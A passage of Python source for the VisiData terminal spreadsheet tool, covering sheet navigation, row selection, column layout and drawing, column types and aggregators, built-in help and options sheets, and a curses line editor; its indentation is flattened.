self.commands[ks] = (ks, helpstr, execstr)
def moveRegex(self, *args, **kwargs):
'Wrap `VisiData.searchRegex`, with cursor additionally moved.'
list(self.searchRegex(*args, moveCursor=True, **kwargs))
def searchRegex(self, *args, **kwargs):
'Wrap `VisiData.searchRegex`.'
return self.vd.searchRegex(self, *args, **kwargs)
def searchColumnNameRegex(self, colregex):
'Select visible column matching `colregex`, if found.'
for i, c in enumPivot(self.visibleCols, self.cursorVisibleColIndex):
if re.search(colregex, c.name, regex_flags()):
self.cursorVisibleColIndex = i
return
def recalc(self):
for c in self.columns:
if c._cachedValues:
c._cachedValues.clear()
def reload(self):
'Default reloader, wrapping `loader` member function.'
if self.loader:
self.loader()
else:
status('no reloader')
def copy(self, suffix="'"):
'''Return copy of this sheet, with `suffix` appended to `name`, and a deepcopy of `columns`,
so their display attributes (width, etc) may be adjusted independently.'''
c = copy.copy(self)
c.name += suffix
c.topRowIndex = c.cursorRowIndex = 0
c.columns = copy.deepcopy(self.columns)
c._selectedRows = self._selectedRows.copy()
c.colorizers = self.colorizers.copy()
return c
@async
def deleteSelected(self):
'Delete all selected rows.'
oldrows = self.rows
oldidx = self.cursorRowIndex
ndeleted = 0
row = None # row to re-place cursor after
while oldidx < len(oldrows):
if not self.isSelected(oldrows[oldidx]):
row = self.rows[oldidx]
break
oldidx += 1
self.rows = []
for r in self.genProgress(oldrows):
if not self.isSelected(r):
self.rows.append(r)
if r is row:
self.cursorRowIndex = len(self.rows) - 1
else:
ndeleted += 1
nselected = len(self._selectedRows)
self._selectedRows.clear()
status('deleted %s rows' % ndeleted)
if ndeleted != nselected:
error('expected %s' % nselected)
def __repr__(self):
return self.name
def exec_command(self, vdglobals, cmd):
'Wrap execution of `cmd`, adding globals and `locs` dictionary.'
escaped = False
if vdglobals is None:
vdglobals = globals()
# handy globals for use by commands
keystrokes, _, execstr = cmd
self.sheet = self
locs = LazyMap(dir(self),
lambda k, s=self: getattr(s, k),
lambda k, v, s=self: setattr(s, k, v)
)
self.vd.callHook('preexec', self, keystrokes)
try:
exec(execstr, vdglobals, locs)
except EscapeException as e: # user aborted
self.vd.status(e.args[0])
escaped = True
except Exception:
self.vd.exceptionCaught()
self.vd.callHook('postexec', self.vd.sheets[0] if self.vd.sheets else None, escaped)
return escaped
@property
def name(self):
'Wrap return of `_name`.'
return self._name
@name.setter
def name(self, name):
'Wrap setting of `_name`.'
self._name = name.replace(' ', '_')
@property
def source(self):
'Return first source, if any.'
if not self.sources:
return None
else:
# assert len(self.sources) == 1, len(self.sources)
return self.sources[0]
@property
def progressPct(self):
'Return percentage of rows completed.'
if self.progressTotal != 0:
return int(self.progressMade * 100 / self.progressTotal)
@property
def nVisibleRows(self):
'Return number of visible rows, calculable from window height.'
return self.vd.windowHeight - 2
@property
def cursorCol(self):
'Return current Column object.'
return self.visibleCols[self.cursorVisibleColIndex]
@property
def cursorRow(self):
'Return current row.'
return self.rows[self.cursorRowIndex]
@property
def visibleRows(self): # onscreen rows
'Return a list of rows currently visible onscreen.'
return self.rows[self.topRowIndex:self.topRowIndex + self.nVisibleRows]
@property
def visibleCols(self): # non-hidden cols
'Return a list of unhidden Column objects.'
return [c for c in self.columns if not c.hidden]
@property
def visibleColNames(self):
'Return string of visible column-names.'
return ' '.join(c.name for c in self.visibleCols)
@property
def cursorColIndex(self):
'Return index of current column into Sheet.columns.'
return self.columns.index(self.cursorCol)
@property
def keyCols(self):
'Return list of key columns.'
return self.columns[:self.nKeys]
@property
def nonKeyVisibleCols(self):
'Return list of unhidden non-key columns.'
return [c for c in self.columns[self.nKeys:] if not c.hidden]
@property
def keyColNames(self):
'Return string of key column names.'
return options.disp_key_sep.join(c.name for c in self.keyCols)
@property
def cursorValue(self):
'Return cell contents at current row and column.'
return self.cellValue(self.cursorRowIndex, self.cursorColIndex)
@property
def statusLine(self):
'Return status-line element showing row and column stats.'
rowinfo = 'row %d/%d (%d selected)' % (self.cursorRowIndex, self.nRows, len(self._selectedRows))
colinfo = 'col %d/%d (%d visible)' % (self.cursorColIndex, self.nCols, len(self.visibleCols))
return '%s %s' % (rowinfo, colinfo)
@property
def nRows(self):
'Return number of rows.'
return len(self.rows)
@property
def nCols(self):
'Return number of columns.'
return len(self.columns)
@property
def nVisibleCols(self):
'Return number of visible columns.'
return len(self.visibleCols)
## selection code
def isSelected(self, r):
'Return boolean: is current row selected?'
return id(r) in self._selectedRows
@async
def toggle(self, rows):
'Select any unselected rows.'
for r in self.genProgress(rows, len(self.rows)):
if not self.unselectRow(r):
self.selectRow(r)
def selectRow(self, row):
'Select given row.'
self._selectedRows[id(row)] = row
def unselectRow(self, row):
'Unselect given row, return True if selected; else return False.'
if id(row) in self._selectedRows:
del self._selectedRows[id(row)]
return True
else:
return False
@async
def select(self, rows, status=True, progress=True):
'Select given rows with option for progress-tracking.'
before = len(self._selectedRows)
for r in (self.genProgress(rows) if progress else rows):
self.selectRow(r)
if status:
self.vd.status('selected %s%s rows' % (len(self._selectedRows) - before, ' more' if before > 0 else ''))
@async
def unselect(self, rows, status=True, progress=True):
'Unselect given rows with option for progress-tracking.'
before = len(self._selectedRows)
for r in (self.genProgress(rows) if progress else rows):
self.unselectRow(r)
if status:
self.vd.status('unselected %s/%s rows' % (before - len(self._selectedRows), before))
def selectByIdx(self, rowIdxs):
'Select given rows by index numbers.'
self.select((self.rows[i] for i in rowIdxs), progress=False)
def unselectByIdx(self, rowIdxs):
'Unselect given rows by index numbers.'
self.unselect((self.rows[i] for i in rowIdxs), progress=False)
def gatherBy(self, func):
'Yield each row matching the cursor value '
for r in self.genProgress(self.rows):
if func(r):
yield r
@property
def selectedRows(self):
'Return a list of selected rows in sheet order.'
return [r for r in self.rows if id(r) in self._selectedRows]
## end selection code
def moveVisibleCol(self, fromVisColIdx, toVisColIdx):
'Move column to another position in sheet.'
fromColIdx = self.columns.index(self.visibleCols[fromVisColIdx])
toColIdx = self.columns.index(self.visibleCols[toVisColIdx])
moveListItem(self.columns, fromColIdx, toColIdx)
return toVisColIdx
def cursorDown(self, n):
"Increment cursor's row by `n`."
self.cursorRowIndex += n
def cursorRight(self, n):
"Increment cursor's column by `n`."
self.cursorVisibleColIndex += n
self.calcColLayout()
def pageLeft(self):
'''Redraw page one screen to the left.
Note: keep the column cursor in the same general relative position:
- if it is on the furthest right column, then it should stay on the
furthest right column if possible
- likewise on the left or in the middle
So really both the `leftIndex` and the `cursorIndex` should move in
tandem until things are correct.'''
targetIdx = self.leftVisibleColIndex # for rightmost column
firstNonKeyVisibleColIndex = self.visibleCols.index(self.nonKeyVisibleCols[0])
while self.rightVisibleColIndex != targetIdx and self.leftVisibleColIndex > firstNonKeyVisibleColIndex:
self.cursorVisibleColIndex -= 1
self.leftVisibleColIndex -= 1
self.calcColLayout() # recompute rightVisibleColIndex
# in case that rightmost column is last column, try to squeeze maximum real estate from screen
if self.rightVisibleColIndex == self.nVisibleCols - 1:
# try to move further left while right column is still full width
while self.leftVisibleColIndex > 0:
rightcol = self.visibleCols[self.rightVisibleColIndex]
if rightcol.width > self.visibleColLayout[self.rightVisibleColIndex][1]:
# went too far
self.cursorVisibleColIndex += 1
self.leftVisibleColIndex += 1
break
else:
self.cursorVisibleColIndex -= 1
self.leftVisibleColIndex -= 1
self.calcColLayout() # recompute rightVisibleColIndex
def cellValue(self, rownum, col):
'Return cell value for given row number and Column object.'
if not isinstance(col, Column):
# assume it's the column number
col = self.columns[col]
return col.getValue(self.rows[rownum])
def addColumn(self, col, index=None):
'Insert column before current column or at given index.'
if index is None:
index = len(self.columns)
if col:
self.columns.insert(index, col)
def toggleKeyColumn(self, colidx):
'Toggle column at given index as key column.'
if colidx >= self.nKeys: # if not a key, add it
moveListItem(self.columns, colidx, self.nKeys)
self.nKeys += 1
return 1
else: # otherwise move it after the last key
self.nKeys -= 1
moveListItem(self.columns, colidx, self.nKeys)
return 0
def moveToNextRow(self, func, reverse=False):
'Move cursor to next (prev if reverse) row for which func returns True. Returns False if no row meets the criteria.'
rng = range(self.cursorRowIndex - 1, -1, -1) if reverse else range(self.cursorRowIndex + 1, self.nRows)
for i in rng:
if func(self.rows[i]):
self.cursorRowIndex = i
return True
return False
def checkCursor(self):
'Keep cursor in bounds of data and screen.'
# keep cursor within actual available rowset
if self.nRows == 0 or self.cursorRowIndex <= 0:
self.cursorRowIndex = 0
elif self.cursorRowIndex >= self.nRows:
self.cursorRowIndex = self.nRows - 1
if self.cursorVisibleColIndex <= 0:
self.cursorVisibleColIndex = 0
elif self.cursorVisibleColIndex >= self.nVisibleCols:
self.cursorVisibleColIndex = self.nVisibleCols - 1
if self.topRowIndex <= 0:
self.topRowIndex = 0
elif self.topRowIndex > self.nRows - self.nVisibleRows:
self.topRowIndex = self.nRows - self.nVisibleRows
# (x,y) is relative cell within screen viewport
x = self.cursorVisibleColIndex - self.leftVisibleColIndex
y = self.cursorRowIndex - self.topRowIndex + 1 # header
# check bounds, scroll if necessary
if y < 1:
self.topRowIndex = self.cursorRowIndex
elif y > self.nVisibleRows:
self.topRowIndex = self.cursorRowIndex - self.nVisibleRows + 1
if x <= 0:
self.leftVisibleColIndex = self.cursorVisibleColIndex
else:
while True:
if self.leftVisibleColIndex == self.cursorVisibleColIndex: # not much more we can do
break
self.calcColLayout()
if self.cursorVisibleColIndex < min(self.visibleColLayout.keys()):
self.leftVisibleColIndex -= 1
continue
elif self.cursorVisibleColIndex > max(self.visibleColLayout.keys()):
self.leftVisibleColIndex += 1
continue
cur_x, cur_w = self.visibleColLayout[self.cursorVisibleColIndex]
if cur_x + cur_w < self.vd.windowWidth: # current columns fit entirely on screen
break
self.leftVisibleColIndex += 1
def calcColLayout(self):
'Set right-most visible column, based on calculation.'
self.visibleColLayout = {}
x = 0
vcolidx = 0
for vcolidx in range(0, self.nVisibleCols):
col = self.visibleCols[vcolidx]
if col.width is None and self.visibleRows:
col.width = col.getMaxWidth(self.visibleRows) + len(options.disp_more_left) + len(
options.disp_more_right)
width = col.width if col.width is not None else col.getMaxWidth(
self.visibleRows) # handle delayed column width-finding
if col in self.keyCols or vcolidx >= self.leftVisibleColIndex: # visible columns
self.visibleColLayout[vcolidx] = [x, min(width, self.vd.windowWidth - x)]
x += width + len(options.disp_column_sep)
if x > self.vd.windowWidth - 1:
break
self.rightVisibleColIndex = vcolidx
def drawColHeader(self, scr, y, vcolidx):
'Compose and draw column header for given vcolidx.'
col = self.visibleCols[vcolidx]
# hdrattr highlights whole column header
# sepattr is for header separators and indicators
sepattr = colors[options.color_column_sep]
hdrattr = self.colorizeHdr(col)
C = options.disp_column_sep
if (self.keyCols and col is self.keyCols[-1]) or vcolidx == self.rightVisibleColIndex:
C = options.disp_keycol_sep
x, colwidth = self.visibleColLayout[vcolidx]
# ANameTC
T = typemap.get(col.type, '?')
N = ' ' + (col.name or defaultColNames[vcolidx]) # save room at front for LeftMore
if len(N) > colwidth - 1:
N = N[:colwidth - len(options.disp_truncator)] + options.disp_truncator
_clipdraw(scr, y, x, N, hdrattr, colwidth)
_clipdraw(scr, y, x + colwidth - len(T), T, hdrattr, len(T))
if vcolidx == self.leftVisibleColIndex and col not in self.keyCols and self.nonKeyVisibleCols.index(col) > 0:
A = options.disp_more_left
scr.addstr(y, x, A, sepattr)
if C and x + colwidth + len(C) < self.vd.windowWidth:
scr.addstr(y, x + colwidth, C, sepattr)
def isVisibleIdxKey(self, vcolidx):
'Return boolean: is given column index a key column?'
return self.visibleCols[vcolidx] in self.keyCols
def draw(self, scr):
'Draw entire screen onto the `scr` curses object.'
numHeaderRows = 1
scr.erase() # clear screen before every re-draw
if not self.columns:
return
self.rowLayout = {}
self.calcColLayout()
for vcolidx, colinfo in sorted(self.visibleColLayout.items()):
x, colwidth = colinfo
col = self.visibleCols[vcolidx]
if x < self.vd.windowWidth: # only draw inside window
headerRow = 0
self.drawColHeader(scr, headerRow, vcolidx)
y = headerRow + numHeaderRows
for rowidx in range(0, self.nVisibleRows):
if self.topRowIndex + rowidx >= self.nRows:
break
self.rowLayout[self.topRowIndex + rowidx] = y
row = self.rows[self.topRowIndex + rowidx]
cellval = col.getDisplayValue(row, colwidth - 1)
attr = self.colorizeCell(col, row, cellval)
sepattr = self.colorizeRow(row) or colors[options.color_column_sep]
_clipdraw(scr, y, x, options.disp_column_fill + cellval, attr, colwidth)
annotation = ''
if isinstance(cellval, CalcErrorStr):
annotation = options.disp_getter_exc
notecolor = colors[options.color_getter_exc]
elif isinstance(cellval, WrongTypeStr):
annotation = options.disp_format_exc
notecolor = colors[options.color_format_exc]
if annotation:
_clipdraw(scr, y, x + colwidth - len(annotation), annotation, notecolor, len(annotation))
sepchars = options.disp_column_sep
if (self.keyCols and col is self.keyCols[-1]) or vcolidx == self.rightVisibleColIndex:
sepchars = options.disp_keycol_sep
if x + colwidth + len(sepchars) <= self.vd.windowWidth:
scr.addstr(y, x + colwidth, sepchars, sepattr)
y += 1
if vcolidx + 1 < self.nVisibleCols:
scr.addstr(headerRow, self.vd.windowWidth - 2, options.disp_more_right, colors[options.color_column_sep])
def editCell(self, vcolidx=None, rowidx=None):
'''Call `editText` on given cell after setting other parameters.
Return row after editing cell.'''
if options.readonly:
status('readonly mode')
return
if vcolidx is None:
vcolidx = self.cursorVisibleColIndex
x, w = self.visibleColLayout.get(vcolidx, (0, 0))
col = self.visibleCols[vcolidx]
if rowidx is None:
rowidx = self.cursorRowIndex
if rowidx < 0: # header
y = 0
currentValue = col.name
else:
y = self.rowLayout.get(rowidx, 0)
currentValue = self.cellValue(self.cursorRowIndex, col)
r = self.vd.editText(y, x, w, value=currentValue, fillchar=options.disp_edit_fill,
truncchar=options.disp_truncator)
if rowidx >= 0:
r = col.type(r) # convert input to column type
return r
class WrongTypeStr(str):
'Wrap `str` to indicate that type-conversion failed.'
pass
class CalcErrorStr(str):
'Wrap `str` (perhaps with error message), indicating `getValue` failed.'
pass
def distinct(values):
'Count unique elements in `values`.'
return len(set(values))
def avg(values):
return float(sum(values)) / len(values) if values else None
mean = avg
def count(values):
'Count total number of non-None elements.'
return len([x for x in values if x is not None])
_sum = sum
_max = max
_min = min
def sum(*values): return _sum(*values)
def max(*values): return _max(*values)
def min(*values): return _min(*values)
avg.type = float
count.type = int
distinct.type = int
sum.type = None
min.type = None
max.type = None
aggregators = {'': None,
'distinct': distinct,
'sum': sum,
'avg': avg,
'mean': avg,
'count': count, # (non-None)
'min': min,
'max': max
}
class Column:
def __init__(self, name, type=anytype, getter=lambda r: r, setter=None, width=None, fmtstr=None, cache=False):
self.name = name # use property setter from the get-go to strip spaces
self.type = type # anytype/str/int/float/date/func
self.getter = getter # getter(r)
self.setter = setter # setter(r,v)
self.width = width # == 0 if hidden, None if auto-compute next time
self.expr = None # Python string expression if computed column
self.aggregator = None # function to use on the list of column values when grouping
self.fmtstr = fmtstr
self._cachedValues = collections.OrderedDict() if cache else None
def copy(self):
return copy.copy(self)
@property
def name(self):
return self._name
@name.setter
def name(self, name):
if options.force_valid_names:
name = ''.join(c for c in str(name) if
unicodedata.category(c) not in ('Cc', 'Zs', 'Zl')) # control char, space, line sep
self._name = name
####### cut; move global-getting into columnssheet
@property
def type(self):
return self._type
@type.setter
def type(self, t):
'Sets `_type` from t as either a typename or a callable. Revert to anytype if not callable.'
if isinstance(t, str):
t = globals()[t]
if t:
assert callable(t)
self._type = t
else:
self._type = anytype
@property
def aggregator(self):
return self._aggregator
@aggregator.setter
def aggregator(self, aggfunc):
'Set `_aggregator` to given `aggfunc`, which is either a function or a string naming a global function.'
if isinstance(aggfunc, str):
if aggfunc:
aggfunc = globals()[aggfunc]
if aggfunc:
assert callable(aggfunc)
self._aggregator = aggfunc
else:
self._aggregator = None
###### end cut
def format(self, cellval):
'Return displayable string of `cellval` according to our `Column.type` and `Column.fmtstr`'
if isinstance(cellval, (list, dict)):
# complex objects can be arbitrarily large (like sheet.rows)
return str(type(cellval))
t = self.type
val = t(cellval)
if t is date:
return val.to_string(self.fmtstr)
elif self.fmtstr is not None:
return self.fmtstr.format(val)
elif t is int:
return '{:d}'.format(val)
elif t is float:
return '{:.02f}'.format(val)
elif t is currency:
return '{:,.02f}'.format(val)
else:
return str(val)
@property
def hidden(self):
'A column is hidden if its width == 0.'
return self.width == 0
def nEmpty(self, rows):
'Count rows that are empty strings or None.'
vals = self.values(rows)
return sum(1 for v in vals if v == '' or v == None)
def values(self, rows):
'Return a list of values for the given `rows` at this Column.'
return [self.getValue(r) for r in rows]
def getValue(self, row):
'''Returns the properly-typed value for the given row at this column.
Returns the type's default value if either the getter or the type conversion fails.'''
try:
v = self.getter(row)
except EscapeException:
raise
except Exception:
exceptionCaught(status=False)
return self.type()
try:
return self.type(v) # convert type on-the-fly
except EscapeException:
raise
except Exception:
exceptionCaught(status=False)
return self.type() # return a suitable value for this type
def getDisplayValue(self, row, width=None):
if self._cachedValues is None:
return self._getDisplayValue(row, width)
k = (id(row), width)
if k in self._cachedValues:
return self._cachedValues[k]
ret = self._getDisplayValue(row, width)
self._cachedValues[k] = ret
if len(self._cachedValues) > 256: # max number of entries
self._cachedValues.popitem(last=False)
return ret
def _getDisplayValue(self, row, width=None):
'Format cell value for display and return.'
try:
cellval = self.getter(row)
except EscapeException:
raise
except Exception as e:
exceptionCaught(status=False)
return CalcErrorStr(options.disp_error_val)
if cellval is None:
return options.disp_none
if isinstance(cellval, bytes):
cellval = cellval.decode(options.encoding, options.encoding_errors)
try:
cellval = self.format(cellval)
if width and self._type in (int, float, currency):
cellval = cellval.rjust(width - 1)
except EscapeException:
raise
except Exception as e:
exceptionCaught(status=False)
cellval = WrongTypeStr(str(cellval))
return cellval
def setValues(self, rows, value):
'Set given rows to `value`.'
if not self.setter:
error('column cannot be changed')
value = self.type(value)
for r in rows:
self.setter(r, value)
def getMaxWidth(self, rows):
'Return the maximum length of any cell in column or its header.'
w = 0
if len(rows) > 0:
w = max(max(len(self.getDisplayValue(r)) for r in rows), len(self.name)) + 2
return max(w, len(self.name))
def toggleWidth(self, width):
'Change column width to either given `width` or default value.'
if self.width != width:
self.width = width
else:
self.width = int(options.default_width)
# ---- Column makers
def ColumnAttr(attrname, type=anytype, **kwargs):
'Return Column object with `attrname` from current row Python object.'
return Column(attrname, type=type,
getter=lambda r, b=attrname: getattr(r, b),
setter=lambda r, v, b=attrname: setattr(r, b, v),
**kwargs)
def ColumnItem(attrname, itemkey, **kwargs):
'Return Column object (with getitem/setitem) on the row Python object.'
def setitem(r, i, v): # function needed for use in lambda
r[i] = v
return Column(attrname,
getter=lambda r, i=itemkey: r[i],
setter=lambda r, v, i=itemkey, f=setitem: f(r, i, v),
**kwargs)
def ArrayNamedColumns(columns):
'''Return list of Column objects from named columns.
Note: argument `columns` is a list of column names, Mapping to r[0]..r[n].'''
return [ColumnItem(colname, i) for i, colname in enumerate(columns)]
def ArrayColumns(ncols):
'''Return list of Column objects.
Note: argument `ncols` is a count of columns,'''
return [ColumnItem('', i, width=8) for i in range(ncols)]
def SubrowColumn(origcol, subrowidx, **kwargs):
'Return Column object from sub-row.'
return Column(origcol.name, origcol.type,
getter=lambda r, i=subrowidx, f=origcol.getter: r[i] and f(r[i]) or None,
setter=lambda r, v, i=subrowidx, f=origcol.setter: r[i] and f(r[i], v) or None,
width=origcol.width,
**kwargs)
def ColumnAttrNamedObject(name):
'Return an effective ColumnAttr which displays the __name__ of the object value.'
def _getattrname(o, k):
v = getattr(o, k)
return v.__name__ if v else None
return Column(name, getter=lambda r, name=name: _getattrname(r, name),
setter=lambda r, v, name=name: setattr(r, name, v))
def input(prompt, type='', **kwargs):
'Compose input prompt.'
if type:
ret = _inputLine(prompt, history=list(vd().lastInputs[type].keys()), **kwargs)
vd().lastInputs[type][ret] = ret
else:
ret = _inputLine(prompt, **kwargs)
return ret
def _inputLine(prompt, **kwargs):
'Add prompt to bottom of screen and get line of input from user.'
scr = vd().scr
if scr:
windowHeight, windowWidth = scr.getmaxyx()
scr.addstr(windowHeight - 1, 0, prompt)
vd().inInput = True
ret = vd().editText(windowHeight - 1, len(prompt), windowWidth - len(prompt) - 8,
attr=colors[options.color_edit_cell], unprintablechar=options.disp_unprintable, **kwargs)
vd().inInput = False
return ret
def confirm(prompt):
yn = input(prompt, value='n')[:1]
if not yn or yn not in 'Yy':
error('disconfirmed')
import unicodedata
def clipstr(s, dispw):
'''Return clipped string and width in terminal display characters.
Note: width may differ from len(s) if East Asian chars are 'fullwidth'.'''
w = 0
ret = ''
ambig_width = options.unicode_ambiguous_width
for c in s:
if c != ' ' and unicodedata.category(c) in ('Cc', 'Zs', 'Zl'): # control char, space, line sep
ret += options.disp_oddspace
w += len(options.disp_oddspace)
else:
ret += c
eaw = unicodedata.east_asian_width(c)
if eaw == 'A': # ambiguous
w += ambig_width
elif eaw in 'WF': # wide/full
w += 2
elif not unicodedata.combining(c):
w += 1
if w > dispw - len(options.disp_truncator) + 1:
ret = ret[:-2] + options.disp_truncator # replace final char with ellipsis
w += len(options.disp_truncator)
break
return ret, w
## Built-in sheets
## text viewer and dir browser
class TextSheet(Sheet):
'Sheet displaying a string (one line per row) or a list of strings.'
@async
def reload(self):
'Populate sheet via `reload` function.'
self.rows = []
self.columns = [Column(self.name, width=self.vd.windowWidth, getter=lambda r: r[1])]
if isinstance(self.source, list):
for x in self.source:
# copy so modifications don't change 'original'; also one iteration through generator
self.addLine(x)
elif isinstance(self.source, str):
for L in self.source.splitlines():
self.addLine(L)
elif isinstance(self.source, io.IOBase):
for L in self.source:
self.addLine(L[:-1])
else:
error('unknown text type ' + str(type(self.source)))
def addLine(self, text):
'Handle text re-wrapping.'
if options.textwrap:
startingLine = len(self.rows)
for i, L in enumerate(textwrap.wrap(text, width=self.vd.windowWidth - 2)):
self.rows.append((startingLine + i, L))
else:
self.rows.append((len(self.rows), text))
class ColumnsSheet(Sheet):
def __init__(self, srcsheet):
super().__init__(srcsheet.name + '_columns', srcsheet)
self.addColorizer('row', 8, lambda self, c, r, v: options.color_key_col if r in self.source.keyCols else None)
self.columns = [
ColumnAttr('name', str),
ColumnAttr('width', int),
ColumnAttrNamedObject('type'),
ColumnAttr('fmtstr', str),
Column('value', anytype, lambda c, sheet=self.source: c.getDisplayValue(sheet.cursorRow)),
]
def reload(self):
self.rows = self.source.columns
class SheetsSheet(Sheet):
def __init__(self):
super().__init__('sheets', vd().sheets,
columns=list(ColumnAttr(name) for name in
'name nRows nCols nVisibleCols cursorValue keyColNames source'.split()))
def reload(self):
self.rows = vd().sheets
self.command(ENTER, 'moveListItem(vd.sheets, cursorRowIndex, 0); vd.sheets.pop(1)', 'jump to this sheet')
class HelpSheet(Sheet):
'Show all commands available to the source sheet.'
def reload(self):
self.columns = [ColumnItem('keystrokes', 0),
ColumnItem('action', 1),
Column('with_g_prefix', str,
lambda r, self=self: self.source.commands.get('g' + r[0], (None, '-'))[1]),
ColumnItem('execstr', 2, width=0),
]
self.nKeys = 1
self.rows = []
for src in self.source.commands.maps:
self.rows.extend(src.values())
class OptionsObject:
'minimalist options framework'
def __init__(self, d):
object.__setattr__(self, '_opts', d)
def __getattr__(self, k):
name, value, default, helpstr = self._opts[k]
return value
def __setattr__(self, k, v):
self.__setitem__(k, v)
def __setitem__(self, k, v):
if k not in self._opts:
raise Exception('no such option "%s"' % k)
self._opts[k][1] = type(self._opts[k][1])(v)
options = OptionsObject(baseOptions)
class OptionsSheet(Sheet):
def __init__(self, d):
super().__init__('options', d)
self.columns = ArrayNamedColumns('option value default description'.split())
self.command([ENTER, 'e'], 'source[cursorRow[0]] = editCell(1)', 'edit this option')
self.nKeys = 1
def reload(self):
self.rows = list(self.source._opts.values())
vd().optionsSheet = OptionsSheet(options)
# A .. Z AA AB .. ZY ZZ
defaultColNames = list(''.join(j) for i in range(options.maxlen_col_hdr)
for j in itertools.product(string.ascii_uppercase,
repeat=i + 1)
)
### Curses helpers
def _clipdraw(scr, y, x, s, attr, w):
'Draw string `s` at (y,x)-(y,x+w), clipping with ellipsis char.'
_, windowWidth = scr.getmaxyx()
dispw = 0
try:
if w is None:
w = windowWidth - 1
w = min(w, windowWidth - x - 1)
if w == 0: # no room anyway
return
# convert to string just before drawing
s, dispw = clipstr(str(s), w)
scr.addstr(y, x, options.disp_column_fill * w, attr)
scr.addstr(y, x, s, attr)
except Exception as e:
# raise type(e)('%s [clip_draw y=%s x=%s dispw=%s w=%s]' % (e, y, x, dispw, w)
# ).with_traceback(sys.exc_info()[2])
pass
# https://stackoverflow.com/questions/19833315/running-system-commands-in-python-using-curses-and-panel-and-come-back-to-previ
class suspend_curses():
'Context Manager to temporarily leave curses mode'
def __enter__(self):
curses.endwin()
def __exit__(self, exc_type, exc_val, tb):
newscr = curses.initscr()
newscr.refresh()
curses.doupdate()
def editText(scr, y, x, w, attr=curses.A_NORMAL, value='', fillchar=' ', truncchar='-', unprintablechar='.',
completer=lambda text, idx: None, history=[], display=True):
'A better curses line editing widget.'
def until_get_wch():
'Ignores get_wch timeouts'
ret = None
while not ret:
try:
ret = scr.get_wch()
except _curses.error:
pass
return ret
def splice(v, i, s):
'Insert `s` into string `v` at `i` (such that v[i] == s[0]).'
return v if i < 0 else v[:i] + s + v[i:]
def clean(s):
'Escape unprintable characters.'
return ''.join(c if c.isprintable() else ('<%04X>' % ord(c)) for c in str(s))
def delchar(s, i, remove=1):
'Delete `remove` characters from str `s` beginning at position `i`.'
return s if i < 0 else s[:i] + s[i + remove:]
def complete(v, comps, cidx):
'Complete keystroke `v` based on list `comps` of completions.'
if comps:
for i in range(cidx, cidx + len(comps)):
i %= len(comps)
if comps[i].startswith(v):
return comps[i]
# beep
return v
def launchExternalEditor(v):
editor = os.environ.get('EDITOR') or error('$EDITOR not set')
import tempfile
fd, fqpn = tempfile.mkstemp(text=True)
with open(fd, 'w') as fp:
fp.write(v)
with suspend_curses():
os.system('%s %s' % (editor, fqpn))
with open(fqpn, 'r') as fp:
return fp.read()
insert_mode = True
first_action = True
v = str(value) # value under edit
i = 0 # index into v
comps_idx = -1
hist_idx = 0
left_truncchar = right_truncchar = truncchar
while True:
if display:
dispval = clean(v)
else:
dispval = '*' * len(v)
dispi = i # the onscreen offset within the field where v[i] is displayed
if len(dispval) < w: # entire value fits
dispval += fillchar * (w - len(dispval))
elif i == len(dispval): # cursor after value (will append)
dispi = w - 1
dispval = left_truncchar + dispval[len(dispval) - w + 2:] + fillchar
elif i >= len(dispval) - w // 2: # cursor within halfwidth of end
dispi = w - (len(dispval) - i)
dispval = left_truncchar + dispval[len(dispval) - w + 1:]
elif i <= w // 2: # cursor within halfwidth of beginning
dispval = dispval[:w - 1] + right_truncchar
else:
dispi = w // 2 # visual cursor stays right in the middle
k = 1 if w % 2 == 0 else 0 # odd widths have one character more
dispval = left_truncchar + dispval[i - w // 2 + 1:i + w // 2 - k] + right_truncchar
scr.addstr(y, x, dispval, attr)
scr.move(y, x + dispi)
ch = vd().getkeystroke(scr)
if ch == '':
continue
elif ch == 'KEY_IC':
insert_mode = not insert_mode
elif ch == '^A' or ch == 'KEY_HOME':
i = 0
elif ch == '^B' or ch == 'KEY_LEFT':
i -= 1
elif ch == '^C' or ch == ESC:
raise EscapeException(ch)
elif ch == '^D' or ch == 'KEY_DC':
v = delchar(v, i)
elif ch == '^E' or ch == 'KEY_END':
i = len(v)
elif ch == '^F' or ch == 'KEY_RIGHT':
i += 1
elif ch in ('^H', 'KEY_BACKSPACE', '^?'):
i -= 1
v = delchar(v, i)
elif ch == '^I':
comps_idx += 1
v = completer(v[:i], comps_idx) or v
elif ch == 'KEY_BTAB':
comps_idx -= 1
v = completer(v[:i], comps_idx) or v
elif ch == ENTER:
break
elif ch == '^K':
v = v[:i] # ^Kill to end-of-line
elif ch == '^R':
v = str(value) # ^Reload initial value
elif ch == '^T':
v = delchar(splice(v, i - 2, v[i - 1]), i) # swap chars
elif ch == '^U':
v = v[i:]
i = 0 # clear to beginning
elif ch == '^V':
v = splice(v, i, until_get_wch())
i += 1 # literal character
elif ch == '^Z':
v = launchExternalEditor(v)
elif history and ch == 'KEY_UP':
hist_idx += 1
v = history[hist_idx % len(history)]
elif history and ch == 'KEY_DOWN':
hist_idx -= 1
v = history[hist_idx % len(history)]
elif ch.startswith('KEY_'):
pass
else:
if first_action:
v = ''
if insert_mode:
v = splice(v, i, ch)
else:
v = v[:i] + ch + v[i + 1:]
i += 1
if i < 0: i = 0
if i > len(v): i = len(v)
first_action = False
return v
class ColorMaker:
def __init__(self):
self.attrs = {}
self.color_attrs = {}
def setup(self):
self.color_attrs['black'] = curses.color_pair(0)
for c in range(0, int(options.num_colors) or curses.COLORS):
curses.init_pair(c + 1, c, curses.COLOR_BLACK)
self.color_attrs[str(c)] = curses.color_pair(c + 1)
for c in 'red green yellow blue magenta cyan white'.split():
colornum = getattr(curses, 'COLOR_' + c.upper())
self.color_attrs[c] = curses.color_pair(colornum + 1)
for a in 'normal blink bold dim reverse standout underline'.split():
self.attrs[a] = getattr(curses, 'A_' + a.upper())
def keys(self):
return list(self.attrs.keys()) + list(self.color_attrs.keys())
def __getitem__(self, colornamestr):
color, prec = self.update(0, 0, colornamestr, 10)
return color
def update(self, attr, attr_prec, colornamestr, newcolor_prec):
attr = attr or 0
if isinstance(colornamestr, str):
for colorname in colornamestr.split(' '):
if colorname in self.color_attrs:
if newcolor_prec > attr_prec:
attr &= ~2047
attr |= self.color_attrs[colorname.lower()]
attr_prec = newcolor_prec
elif colorname in self.attrs:
attr |= self.attrs[colorname.lower()]
return attr, attr_prec
colors = ColorMaker()
def setupcolors(stdscr, f, *args):
curses.raw() # get control keys instead of signals
curses.meta(1) # allow "8-bit chars"
# curses.mousemask(curses.ALL_MOUSE_EVENTS) # enable mouse events
# curses.mouseinterval(0)
return f(stdscr, *args)
